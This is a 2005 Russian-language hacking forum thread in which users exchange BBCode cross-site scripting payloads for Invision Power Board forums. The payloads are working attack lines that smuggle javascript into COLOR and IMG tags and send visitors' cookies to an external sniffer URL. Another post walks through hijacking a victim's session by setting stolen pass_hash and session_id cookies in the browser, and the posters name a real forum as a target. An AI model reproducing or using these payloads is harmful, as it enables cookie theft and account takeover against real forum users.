ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 17.02.2005, 04:57
ExpertLamer
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Потому что первый раз уже вписалось.

Поэтому иди на чистое место.

И когда код виден он соровно работает не бойся.

Тут не код проблема а теги.

Последний раз редактировалось ExpertLamer; 18.02.2005 в 02:07..
 
Ответить с цитированием

  #22  
Старый 17.02.2005, 14:02
FRTD
Познающий
Регистрация: 12.02.2005
Сообщений: 31
Провел на форуме:
59691

Репутация: 0
По умолчанию

понятно,ну этот код тока для эксплорера пашет=(И что хуже,там нету реферера,приходиться сидеть и ждать
 
Ответить с цитированием

  #23  
Старый 17.02.2005, 17:33
FRTD
Познающий
Регистрация: 12.02.2005
Сообщений: 31
Провел на форуме:
59691

Репутация: 0
По умолчанию

а почему не пашет рассылка всех данных снифера?Написано:оставить рефер пустой и пришлют все данные.А пустым он не принимает
 
Ответить с цитированием

  #24  
Старый 17.02.2005, 19:47
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Цитата:
Сообщение от frtd  
а почему не пашет рассылка всех данных снифера?Написано:оставить рефер пустой и пришлют все данные.А пустым он не принимает
Нужно обязательно ставить фильтр либо на реферер, либо на Query.
 
Ответить с цитированием

  #25  
Старый 18.02.2005, 02:16
ExpertLamer
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Цитата:
Сообщение от FRTD  
а почему не пашет рассылка всех данных снифера?Написано:оставить рефер пустой и пришлют все данные.А пустым он не принимает

EDIT: Ошибка, прошу прошение. Когда код виден, то он работать НЕ будит.

Только что проверил.

Ищи другие теги так как проблема почему виден код в том, что ИЭ и Firefox по разному обрабатывают тег "IMG".

И ещё. Ты просто не знаешь что такое что.

Код HTML:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) [/COLOR]
Вот это код. "К:" это QUERY. REFERER это адрес страничьки где находится сам код.
Вот образец REFERER:
http://www.izvestia.ru/forum/topic.c...c=9663&start=0
 
Ответить с цитированием

  #26  
Старый 18.02.2005, 02:30
ExpertLamer
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Когда имеешь кукииз и у тебя нет пароля, то на любых версиях можно зделать следуещие.

Используй javascript:void(document.cookie)

Код:

javascript:void(document.cookie="pass_hash=XXXXXX" ); javascript:void(document.cookie="session_id=XXXXXX "); javascript:void(document.cookie="user_id=XXXXXX")

Это ты должен всё в URL поставить и самое главное не забудь, ты должен быть в входе под другим именем. Тоесть ты должен быть "Logged in". Потом вводишь это и нажимаешь GO а потом Refresh.

И самое главное знай что чтобы это у тебя получилось, твоя жертва тоже должна быть "Logged in". Если у тебя жертва "Logged out" то по МОИМ тестам нечиго не получится. Хотя если Я не прав поправте.

А с прогой Inetcrack тесты Я пока не делал так что не знаю, может не получится если жертва не "Logged in" ?

Алгол Я не разу не мог поменять фонт или попугать людей как ты вот тут. http://antichat.ru/txt/IPB/index1.php
Если можешь, то помоги пожалуйста.

Вот мой код который Я вставляю. Я его изменил на калар тег, но может быть проблема не в теги а в фильтре? Что конкретно что за проблема не понимаю.

Вот Я написал собственный код изменив тег "VIDEO" на "COLOR"

Код HTML:
[COLOR=[IMG]http://aaaaa/=`aaajpg[/IMG]]` style=background:url(javascript:document.body.innerHTML="http://antichat.ru/h.gif")[/COLOR]
Работает но как то не так и только когда PM кому то посылаю. А может быть адрес картинки поменять?
А когда пост делаю вообще не работает может быть потому что фильтор стоит но какой?

Последний раз редактировалось ExpertLamer; 18.02.2005 в 03:12..
 
Ответить с цитированием

  #27  
Старый 18.02.2005, 23:45
FRTD
Познающий
Регистрация: 12.02.2005
Сообщений: 31
Провел на форуме:
59691

Репутация: 0
По умолчанию

чё туда надо вставлять адрес?Типа так?
Код:
[COLOR=]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:http://www.****.com/forum/index.php?showtopic=4"+document.cookie) [/COLOR]
Раз на Фоксе не пойдёт,мож кто нить другой код подскажет?Какой нить универсальный что ли?
По поводу хэша:не проще его расшивровать?Тогда никого ждать не надо

Последний раз редактировалось SladerNon; 04.01.2006 в 00:50..
 
Ответить с цитированием

  #28  
Старый 19.02.2005, 14:55
ExpertLamer
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Чего????

Ты меня совсем запутал. Что встовлять Я помой му уже очень хорошо расказал.

Ещё раз всё прочти или правильно задай вопрос Я не понил что ты спросил.
 
Ответить с цитированием

  #29  
Старый 20.02.2005, 02:51
FRTD
Познающий
Регистрация: 12.02.2005
Сообщений: 31
Провел на форуме:
59691

Репутация: 0
По умолчанию

Распутываю:существует ли какой либо код,но универсальный для большинства браузеров?Если да,то где взять?
 
Ответить с цитированием

  #30  
Старый 20.02.2005, 05:41
ExpertLamer
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Napisat' svoiu.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос. dukalis(AwP) Форумы 14 19.04.2006 19:40
Обход регистрации в Invision Power Board v1.3 Final DeeIP Форумы 1 10.04.2005 20:35
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final rsha1988 Форумы 12 15.02.2005 01:44
Вопрос про уязвимости в Invision Power Board(U) v1.3 Final Майор Форумы 15 14.01.2005 14:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ